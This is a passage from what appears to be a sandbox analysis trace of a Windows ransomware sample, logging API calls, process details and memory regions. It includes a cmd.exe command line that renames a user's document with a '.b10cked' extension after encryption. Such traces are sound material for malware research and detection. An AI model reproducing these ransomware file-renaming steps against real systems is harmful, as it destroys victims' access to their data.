[0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.004] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.004] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] GetFileType (hFile=0x4c) returned 0x1 [0136.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.004] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.005] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.005] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] GetFileType (hFile=0x4c) returned 0x1 [0136.005] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.005] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.006] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.006] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] GetFileType (hFile=0x4c) returned 0x1 [0136.006] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.006] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.007] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.007] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x32, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] GetFileType (hFile=0x4c) returned 0x1 [0136.007] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.007] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x32, lpOverlapped=0x0) returned 1 [0136.007] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.007] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.007] _close (_FileHandle=4) returned 0 [0136.008] FindNextFileW (in: hFindFile=0x330e50, lpFindFileData=0x12efd4 | out: lpFindFileData=0x12efd4) returned 0 [0136.008] GetLastError () returned 0x12 [0136.008] FindClose (in: hFindFile=0x330e50 | out: hFindFile=0x330e50) returned 1 [0136.008] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0136.009] _close (_FileHandle=3) returned 0 [0136.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.009] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.009] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.010] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.010] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.010] SetConsoleInputExeNameW () returned 0x1 [0136.010] GetConsoleOutputCP () returned 0x1b5 [0136.010] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.010] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.010] exit (_Code=0) Process: id = "135" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13585 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13586 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13587 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13588 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 13589 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13590 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13591 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13592 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13593 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 13594 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14194 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14195 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14196 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14197 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 14198 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 14199 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14200 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14201 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14202 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14203 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14204 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14205 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14206 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14207 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14208 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 14209 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14210 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14211 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 14212 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 14213 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 14214 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 14215 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 14216 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 14217 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Thread: id = 192 os_tid = 0xc2c [0136.617] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc24 | out: lpSystemTimeAsFileTime=0x16fc24*(dwLowDateTime=0x8b5c1f20, dwHighDateTime=0x1d440a9)) [0136.617] GetCurrentProcessId () returned 0xc54 [0136.617] GetCurrentThreadId () returned 0xc2c [0136.617] GetTickCount () returned 0x2b28c [0136.617] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc1c | out: lpPerformanceCount=0x16fc1c*=19340650207) returned 1 [0136.618] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.618] __set_app_type (_Type=0x1) [0136.618] __p__fmode () returned 0x76b331f4 [0136.618] __p__commode () returned 0x76b331fc [0136.618] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.618] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.618] GetCurrentThreadId () returned 0xc2c [0136.618] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc2c) returned 0x38 [0136.618] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.619] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.619] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.619] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.619] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fbb4 | out: phkResult=0x16fbb4*=0x0) returned 0x2 [0136.619] VirtualQuery (in: lpAddress=0x16fbeb, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.619] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.619] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.619] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.619] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb84, dwLength=0x1c | out: lpBuffer=0x16fb84*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.619] GetConsoleOutputCP () returned 0x1b5 [0136.619] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.619] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.619] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.619] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.619] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.619] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.620] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.620] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.620] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.620] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.620] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.620] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.620] GetEnvironmentStringsW () returned 0x240168* [0136.620] FreeEnvironmentStringsW (penv=0x240168) returned 1 [0136.620] GetEnvironmentStringsW () returned 0x240168* [0136.620] FreeEnvironmentStringsW (penv=0x240168) returned 1 [0136.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command 